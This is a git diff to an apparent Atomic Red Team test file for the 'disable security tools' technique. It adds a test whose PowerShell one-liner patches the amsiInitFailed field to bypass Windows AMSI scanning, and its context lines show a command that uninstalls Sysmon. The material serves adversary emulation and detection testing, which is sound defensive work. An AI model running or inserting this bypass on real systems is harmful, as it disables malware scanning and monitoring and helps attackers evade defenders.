diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 30f5839e..83a9f35a 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -150,3 +150,16 @@ atomic_tests:
       sysmon -u
     cleanup_command: |
       sysmon -i -accepteula
+
+- name: AMSI Bypass - AMSI InitFailed
+  description: |
+    Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. 
+    https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)